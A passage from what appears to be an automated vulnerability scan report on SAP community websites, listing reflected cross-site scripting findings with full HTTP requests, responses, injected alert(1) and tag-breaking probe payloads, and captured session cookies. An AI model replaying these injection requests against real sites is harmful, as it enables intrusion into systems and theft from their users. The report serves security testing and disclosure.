User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css?1318315094
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 121
Cache-Control: public, max-age=86354
Expires: Sun, 16 Oct 2011 15:28:26 GMT
Date: Sat, 15 Oct 2011 15:29:12 GMT
Connection: close

File not found: /stylesheets813b4<script>alert(1)</script>b80a639f6543df4c<script>alert(1)</script>54d7771a769/style.css

3.25. http://ecohub.sap.com/stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecohub.sap.com
Path:   /stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 39fa5<script>alert(1)</script>b22cba590c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css39fa5<script>alert(1)</script>b22cba590c?1318315094 HTTP/1.1
Host: ecohub.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://ecohub.sap.com/stylesheets813b4%3Cscript%3Ealert(1)%3C/script%3Eb80a639f654/style.css?1318315094
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 404 Not Found
Server: SAP LJS 1.0.0
X-Cascade: pass
Cache-Control: max-age=31536000, public
Expires: Wed, 10 Oct 2012 08:40:08 GMT
SDN_VISIT: QUMxMDU0NkUtMTMzMDdGODYwQzItOEQwRjc1QjM2REUyM0YwMg==
SDN_GUID: QUMxMDU0NkUtMTMzMDdGODYwQzItOEJFMzZBQTBCRjZCQUUxMw==
Content-Type: text/plain
Content-Length: 120
Date: Sat, 15 Oct 2011 15:29:13 GMT
Connection: close

File not found: /stylesheets813b4<script>alert(1)</script>b80a639f654/style.css39fa5<script>alert(1)</script>b22cba590c

3.26. http://forums.sdn.sap.com/forum.jspa [forumID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.sdn.sap.com
Path:   /forum.jspa

Issue detail

The value of the forumID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fdeb</script><a>7cc8d3868a3 was submitted in the forumID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum.jspa?forumID=2099fdeb</script><a>7cc8d3868a3&start=0 HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://forums.sdn.sap.com/forum.jspa?forumID=209&start=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; saplb_*=(J2EE4806300)4806350; JSESSIONID=(J2EE4806300)ID1639050650DB01113137619370041883End; SDNSTATE_FRM=2523140268.14340.0000

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTYtMTMzMDdGOEUwRjEtRjQxNjEwNzEyOTNDN0QyNw==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 9049
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:25:11 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: Not Fou
...[SNIP]...
"..."
   s.prop5="glo"
   s.prop6="visitor"
   s.prop9="logN"
   if(typeof pnf != "undefined") {
       s.pageType=pnf;
       s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/forum.jspa?forumID=2099fdeb</script><a>7cc8d3868a3&start=0";
   }
/* END CUSTOM CODING */
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
   var s_code=s.t()
   if(s_code)document.write(s_code)
} catch (e) {}
//-->
...[SNIP]...

3.27. http://forums.sdn.sap.com/forum.jspa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.sdn.sap.com
Path:   /forum.jspa

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72910"><a>80712adb491 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /forum.jspa?forumID=209&start=0&72910"><a>80712adb491=1 HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTYtMTMzMDdGOTExOEUtODNFQTcyRDhDMjRBMjYzNg==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
SDN_FORUM: 209
SDN_CATEGORY: 6
Content-Length: 45770
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:25:23 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: SAP Tec
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/style/style.jsp?72910"><a>80712adb491=1&amp;forumID=209&amp;start=0" />
...[SNIP]...

3.28. http://forums.sdn.sap.com/forum.jspa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.sdn.sap.com
Path:   /forum.jspa

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e249</script><a>03d13503ced was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum.jspa?forumID=209&start=0&4e249</script><a>03d13503ced=1 HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTYtMTMzMDdGOTM0RDEtODZDQkRCQkM5RDA1OEVBNQ==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
SDN_FORUM: 209
SDN_CATEGORY: 6
Content-Length: 45834
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:25:32 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: SAP Tec
...[SNIP]...
.prop5="glo"
   s.prop6="visitor"
   s.prop9="logN"
   if(typeof pnf != "undefined") {
       s.pageType=pnf;
       s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/forum.jspa?forumID=209&start=0&4e249</script><a>03d13503ced=1";
   }
/* END CUSTOM CODING */
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
   var s_code=s.t()
   if(s_code)document.write(s_code)
} catch (e) {}
//-->
...[SNIP]...

3.29. http://forums.sdn.sap.com/forum.jspa [start parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.sdn.sap.com
Path:   /forum.jspa

Issue detail

The value of the start request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da61d</script><a>3343eb56bb4 was submitted in the start parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum.jspa?forumID=209&start=0da61d</script><a>3343eb56bb4 HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTYtMTMzMDdGOEYwNjctMUI4NjBFNTdCRjdFMjFB
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 9036
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:25:14 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: </title
...[SNIP]...
s.prop5="glo"
   s.prop6="visitor"
   s.prop9="logN"
   if(typeof pnf != "undefined") {
       s.pageType=pnf;
       s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/forum.jspa?forumID=209&start=0da61d</script><a>3343eb56bb4";
   }
/* END CUSTOM CODING */
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
   var s_code=s.t()
   if(s_code)document.write(s_code)
} catch (e) {}
//-->
...[SNIP]...

3.30. http://forums.sdn.sap.com/thread.jspa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.sdn.sap.com
Path:   /thread.jspa

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf476</script><a>2f82619d2da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /thread.jspa?threadID=2059162&tstart=0&bf476</script><a>2f82619d2da=1 HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://forums.sdn.sap.com/forum.jspa?forumID=209&start=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; saplb_*=(J2EE4806300)4806350; JSESSIONID=(J2EE4806300)ID1639050650DB01113137619370041883End; SDNSTATE_FRM=2523140268.14340.0000; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690501070%3B%20pe%3Dno%2520value%7C1318690501073%3B%20c3%3Dno%2520value%7C1318690501076%3B%20s_nr%3D1318688701080-New%7C1321280701080%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292301082%3B%20s_visit%3D1%7C1318690501083%3B%20gpv_p47%3D1%7C1318690501086%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Aforums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//forums.sdn.sap.com/thread.jspa%2525253FthreadID%2525253D2059162%25252526tstart%2525253D0%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTYtMTMzMDdGOUU2RkMtNjhDNzA2NDFGQTJFMDE3NQ==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
SDN_FORUM: 209
SDN_CATEGORY: 6
SDN_THREAD: 2059162
SDN_MESSAGE: 10731664
Content-Length: 22343
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:26:18 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: SAP SEC
...[SNIP]...
"glo"
   s.prop6="visitor"
   s.prop9="logN"
   if(typeof pnf != "undefined") {
       s.pageType=pnf;
       s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/thread.jspa?threadID=2059162&tstart=0&bf476</script><a>2f82619d2da=1";
   }
/* END CUSTOM CODING */
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
   var s_code=s.t()
   if(s_code)document.write(s_code)
} catch (e) {}
//-->
...[SNIP]...

3.31. http://forums.sdn.sap.com/thread.jspa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.sdn.sap.com
Path:   /thread.jspa

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4ddf"><a>ec5e2e237d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /thread.jspa?threadID=2059162&tstart=0&e4ddf"><a>ec5e2e237d2=1 HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://forums.sdn.sap.com/forum.jspa?forumID=209&start=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; saplb_*=(J2EE4806300)4806350; JSESSIONID=(J2EE4806300)ID1639050650DB01113137619370041883End; SDNSTATE_FRM=2523140268.14340.0000; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690501070%3B%20pe%3Dno%2520value%7C1318690501073%3B%20c3%3Dno%2520value%7C1318690501076%3B%20s_nr%3D1318688701080-New%7C1321280701080%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292301082%3B%20s_visit%3D1%7C1318690501083%3B%20gpv_p47%3D1%7C1318690501086%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D2%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Aforums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//forums.sdn.sap.com/thread.jspa%2525253FthreadID%2525253D2059162%25252526tstart%2525253D0%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTYtMTMzMDdGOUM0NDktRDcxQzM1NjVCMjlCQjYzNw==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
SDN_FORUM: 209
SDN_CATEGORY: 6
SDN_THREAD: 2059162
SDN_MESSAGE: 10731664
Content-Length: 22252
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:26:09 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: SAP SEC
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/style/style.jsp?tstart=0&amp;threadID=2059162&amp;e4ddf"><a>ec5e2e237d2=1" />
...[SNIP]...

3.32. http://forums.sdn.sap.com/thread.jspa [threadID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.sdn.sap.com
Path:   /thread.jspa

Issue detail

The value of the threadID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6703c</script><a>08b4367be6b was submitted in the threadID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /thread.jspa?threadID=20591626703c</script><a>08b4367be6b&tstart=0 HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://forums.sdn.sap.com/forum.jspa?forumID=209&start=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; saplb_*=(J2EE4806300)4806350; JSESSIONID=(J2EE4806300)ID1639050650DB01113137619370041883End; SDNSTATE_FRM=2523140268.14340.0000; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690501070%3B%20pe%3Dno%2520value%7C1318690501073%3B%20c3%3Dno%2520value%7C1318690501076%3B%20s_nr%3D1318688701080-New%7C1321280701080%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292301082%3B%20s_visit%3D1%7C1318690501083%3B%20gpv_p47%3D1%7C1318690501086%3B; 